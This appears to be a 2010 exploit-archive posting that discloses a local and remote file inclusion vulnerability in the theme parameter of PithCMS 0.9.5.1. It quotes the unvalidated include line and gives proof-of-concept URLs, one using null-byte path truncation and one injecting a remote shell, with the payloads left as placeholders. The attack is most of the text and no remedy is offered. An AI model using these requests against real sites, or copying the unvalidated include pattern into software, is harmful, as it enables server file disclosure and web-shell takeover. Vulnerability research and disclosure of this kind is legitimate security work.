[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : pithcms (theme) Local Remote File inclusion Vulnerability
# Published : 2010-07-08
# Author : eidelweiss
# Previous Title : SQL Injection Vulnerabilities Green Shop
# Next Title : Zylone IT Multiple Blind SQL Injection Vulnerability
Title: pithcms (theme) Local / remote File inclusion VUlnerability
Version: 0.9.5.1
download: http://sourceforge.net/projects/pithcms/files/
Author: eidelweiss
Contact: g1xsystem[at]windowslive.com
=====================================================================
-=[ CODE ]=-
include ("templates/".$theme."/index.php");
-=[ P0C ]=-
http://127.0.0.1/path/index.php?theme= [LFI]%00
htp://127.0.0.1/path/index.php?theme= [inj3ct0r sh3ll]
=========================| -=[ E0F ]=- |=========================